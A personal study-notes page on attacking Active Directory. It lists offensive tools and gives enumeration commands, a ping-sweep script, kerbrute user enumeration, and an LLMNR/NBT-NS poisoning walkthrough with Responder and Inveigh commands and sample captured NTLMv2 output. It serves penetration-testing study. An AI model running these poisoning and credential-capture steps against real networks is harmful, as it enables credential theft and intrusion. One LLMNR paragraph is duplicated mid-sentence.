AD notes

floof

just a collection of AD notes, tips/tricks and one-liners as a reference for future me

this is, and will be a continuous a work in progress. the notes and potentially even formatting will undergo changes, so check back from time to time:)

tabs on the right to navigate to a specific topic

Active Directory //

 Active Directory (AD) is a distributed, hierarchical structure that allows for centralized management of a set of resources, including:

• users
• computers
• groups
• network devices/file shares
• group policies
• devices
• trusts

AD is a system to provide authentication, accounting and authorization functions within a Windows (enterprise) environment.

AD (& Windows) tools //

tools	more tools
impacket > collection of python network protocol tools	ADRecon > extract various data from target AD environment. can be output in MS Excel format
GetUserSPNs.py > part of impacket. tool to find Service Principle Names tied to users	ldapdomaindump > dump domain info including users, groups, devices etc.
psexec.py > part of impacket. semi-interactive psexec-like shell	gMSAdumper > dump password blobs of service accounts (svc account must be in same group)
wmiexec.py > part of impacket. command execution over WMI	smbmap > SMB share enumeration
mssqlclient.py > part of impacket. provides ability to interact with MSSQL databases	responder > allows you to play mitm for windows authentication, intercepting credentials to services (LLMNR, NBT-NS and MDNS poisoner)
rpcdump.py > part of impacket. RPC endpoint mapper	DomainPasswordSpray > powershell tool to spray against users of a domain
ntlmrelayx.py > part of impacket. SMB relay attacks	PowerView/SharpView > powershell tool to fully enumerate a Windows domain
GetNPUsers.py > part of impacket. ASREPRoasting attack to list AS-REP hashes for users with ‘Do not require Kerberos preauthentication’ set	BloodHound > GUI representation of a visual map of AD relationships. gives clear and concise attack paths they may have otherwised gone unnoticed (a python version based in impacket is also available)
raiseChild.py > part of impacket. automated child to parent domain privilege escalation	SharpHound > c# data collector to gather AD info that can later be ingested into BloodHound
Kerbrute > a Go tool that uses Kerberos pre-auth to enum AD accounts, password spray and brute-force	CrackMapExec > enum, attack and post-exploit toolkit. CME attempts to live-off-the-land and abuse built-in AD features and protocols like SMB, WMI, WinRM and MSSQL
Inveigh.ps1 > similar to responsder. powershell tool for performing various network spoof & poisoning attacks	C# Inveigh > c# version of Inveigh with a semi-interactive console
rpcinfo > utility used to query the status of an RPC program or enumerate the list of available RPC services on a host	rpcclient > part of the Samba suite. can be used to perform a variety of AD enum tasks
enum4linux > tool to enumerate info from Windows and Samba systems	enum4linux-ng > similar to the original, but a bit more versatility, i.e. the ability to export findings as YAML or JSON
Rubeus > C# tools to interact with, and abuse Kerberos	Snaffler > find info in AD on computers with accessible file shares
ldapsearch > interface to interact with the LDAP protocol	windapsearch > python script to enumerate AD users, groups and computers using LDAP queries
LAPSToolkit > powershell written functions that leverage powerview to attack AD environments that have Microsofts Local Administrator Password Solution (LAPS) deployed	smbserver.py > simple SMB server for interaction with Windows hosts
setspn.exe > adds, reads, modifies and deletes the SPN property for an AD service account	Mimikatz > many functions. notably, extracting passwords, pass-the-hash and Kerberos ticket extraction from memory on a host
secretsdump.py > remotely dump SAM and LSA secrets from a host	evil-winrm > provides an interactive shell on a host over the WinRM protocol
noPac.py > exploit combo of CVE-2021-42278 & CVE-2021-42287 to impersonate DA from standard domain user	cube0x0:CVE-2021-1675.py > python printnightmare PoC
PetitPotam.py > CVE-2021-36942 PoC to coerce Windows hosts to authenticat to other machines via MS-EFSRPC (EfsRpcOpenFileRaw) or other functions	gettgtpkinit.py - manipulate certificates and TGTs
getnthash.py > use an existing TGT to request PAC for current user using U2U	adidnsdump > enumerate and dump DNS records from a domain. similar to performing DNS Zone transfer
gpp-decrypt > extract usernames and passwords from Group Policy preferences files	lookupsid.py > SID bruteforcing tool
ticketer.py > creation and customization of TGT/TGS tickets. Great for Golden Ticket creation, child to parent trust attacks, etc	Active Directory Explorer > AD viewer and editor. navigate an AD database, take a snapshot for offline analysis, view object properties & attributes, compare two snapshots to view changes
PingCastle > audit security level of an AD environment based on risk assessment and maturity framework using CMMI program	Group3r > audit and find security misconfigurations in AD Group Policy Objects (GPO)

Enumeration //

 AD users – > enumerate valid user accounts for potential password spraying
 AD joined computers – > key computers include Domain Controllers, file servers, SQL servers, web servers, Exchange mail servers, database servers, SharePoint servers, etc.
 Key services – > Kerberos, NetBIOS, LDAP, DNS, etc
 Vulnerable hosts & services – > a quick win (e.g. SharePoint CVE, etc.)

Starting with passive identification of hosts in the network (while already in the network) ;
  - wireshark - GUI based packet monitoring
  - tcpdump - cli based packet monitoring
  - net-creds - a pcap / network credential sniffer
  - pktmon.exe - network monitoring default installed on win10

With TCPdump :
hack@sparrow$ sudo tcpdump -i eth0

note the protocols being used, and the hosts on the network

Responder in analysis mode :
hack@sparrow$ sudo responder -I eth0 -A

note any new hosts to add to our IP / DNS list

FPing (utilizes ICMP to sweep the network & interact with hosts. Queires hosts in a cyclical manner as opposed to waiting for multiple requests from a single host to return) :
hack@sparrow$ fping -asgq 10.10.10.0/23

validates active hosts for further reconnaissance

similar - but less stealthy - network sweep with basic ping cmd :

bash:

hack@sparrow$ cat sweep.sh
#!/bin/bash
for ip in `seq 1 254`; do
ping -c 1 $1.$ip | grep "64 bytes" | cut -d " " -f 4 | tr -d ":" &
done

hack@sparrow$ ./sweep.sh 192.168.1
192.168.1.2
192.168.1.1
192.168.1.4
192.168.1.7
192.168.1.3
192.168.1.9
192.168.1.8

either option would give us a more detailed list of active hosts to run nmap against. add the live hosts to a text file and feed it to nmap:
hack@sparrow$ sudo nmap -A -iL hosts

we can further enum AD usernames with Kerbrute . Kerberos pre-auth failures often won’t trigger logs/alerts. We can point Kerbrute at the DC and feed it a wordlist of usernames.

We can note down any discovered usernames for a password spray attack when our attacks become more active.

hack@sparrow$ kerbrute userenum -d DOMAINCON.LOCAL --dc 10.10.10.5 jsmith.txt -o valid_ad_users

LLMNR and NBT-NS:

• alternate methods of host identification for when DNS fails
     - ie. DNS resolution fails, typcically the machine will try to ask other machines on the local network for the host via LLMNR
• based on DNS format; allows hosts on same local link to perform name resolution for other hosts
• uses port 5355 UDP natively
• NBT-NS will be used if LLMNR fails
     - identifies systems on local network by NetBIOS name - utilizes port 137 UDP
   Any host on the network can reply to LLMNR/NBT-NS name resolution requests. With network access we can spoof a host that’s supposed to belong in the network segmentLLMNR and NBT-NS:
• alternate methods of host identification ofr when DNS fails
     - ie. DNS resolution fails, typcically the machine will try to ask other machines on the local network for the host via LLMNR
• based on DNS format; allows hosts on same local link to perform name resolution for other hosts
• uses port 5355 UDP natively
• NBT-NS will be used if LLMNR fails
    - identifies systems on local network by NetBIOS name - utilizes port 137 UDP

 Any host on the network can reply to LLMNR/NBT-NS name resolution requests. With network access we can use Responder to poison these requests by spoofing an authoritative name resolution source (ie. a host that’s supposed to belong in the network). Responder will do this by responding to LLMNR and BNBT-NS traffic as if they have an answer - it then captures the NetNTLM hash used to authenticate to us which we can crack offline. This can also lead to SMB relay attacks.

Example scenario:

1. Host attempts to connect to share at \\share02.example.local but accidentally types \shar02.example.local
2. The DNS server respons stating that the requested host is unknown
3. The host broadcasts to the entire local network asking where \\shar02.example.local is
4. Responder replies to the host that it is \\shar02.example.local
5. The host believes it and sends an authentication request to Responder with a username and NTLMv2 hash
6. We use the hash to crack the password offline or try an SMB relay attack
   

LLMNR / NBT-NS poisoning tools:

tools	description
Responder	> purpose built to poison LLMNR, NBT-NS and MDNS
Inveigh	> cross-platform MitM for spoofing and poisoning attacks
Metasploit	> several built-in scanners and spoofing modules made for poisoning

Responder and Inveigh can be used against the following protocols:

• LLMNR
• DNS
• MDNS
• NBNS
• DHCP
• ICMP
• HTTP
• HTTPS
• SMB
• LDAP
• WebDAV
• Proxy Auth
  Responder also has support for:
• MSSQL
• DCE-RPC
• FTP, POP3, IMAP, and SMTP auth
  Some typical modes for Responder include:
• -A which puts us into analyze mode to see NBT-NS/BROWSER/LLMNR requests
• -w uses built-in WPAD proxy server, effective in capturing HTTP requests when user launches Internet Explorer w/ auto-detect settings enabled
• -f attempt to fingerprint the remote host OS & version
• -F & -P can be used to force NTLM or basic auth but may cause a login prompt

Responder will write hashes to screen and to /usr/share/responder/logs.

example command:

┌──(hack🐱sparrow)-[~]
└─$ sudo responder -I eth0 -w

                                         __
  .----.-----.-----.-----.-----.-----.--|  |.-----.----.
  |   _|  -__|__ --|  _  |  _  |     |  _  ||  -__|   _|
  |__| |_____|_____|   __|_____|__|__|_____||_____|__|
                   |__|

           NBT-NS, LLMNR & MDNS Responder 3.0.6.0

  Author: Laurent Gaffie (laurent.gaffie@gmail.com)
  To kill this script hit CTRL-C

[*] [MDNS] Poisoned answer sent to 10.10.10.11 for name web03.local
[*] [LLMNR]  Poisoned answer sent to 10.10.10.11 for name web03
[SMB] NTLMv2 Client   : 10.10.10.11
[SMB] NTLMv2 Username : domain\admin
[SMB] NTLMv2 Hash     : admin::domain:ffee000aa

from here we can take the hash and slap it into john to crack it offline (using the netntlmv2 format)

Poisoning from Windows

We’ll be using Inveigh on a Windows host.

First we have to make sure we can execute powershell scripts:
PS C:\> Set-ExecutionPolicy -ExecutionPolicy RemoteSigned

With the PowerShell version we’d run it like so:
PS C:\> Import-Module .\Inveigh.ps1

We can view the list of Inveigh parameters on their wiki or by running this command:
PS C:\> (Get-Command Invoke-Inveigh).Parameters

Running Inveigh like Responder to poison LLMNR/NBNS (we need admin privs to run SMB listener):
PS C:\> Invoke-Inveigh -NBNS Y -NBNSTypes "20","00" -ConsoleOutput Y -SMB Y

Clear-Inveigh – clear the Inveigh hashtable
Get-Inveigh – get data from the Inveigh hashtable
   -NTLMV2 parameter to return all NTLMv2 hashes that were captured
Stop-Inveigh – stop all running Inveigh modules
Watch-Inveigh – enable real time console output

If we need to use the .exe version, we can find examples of usage from the repo

slow work in-progress. check back next week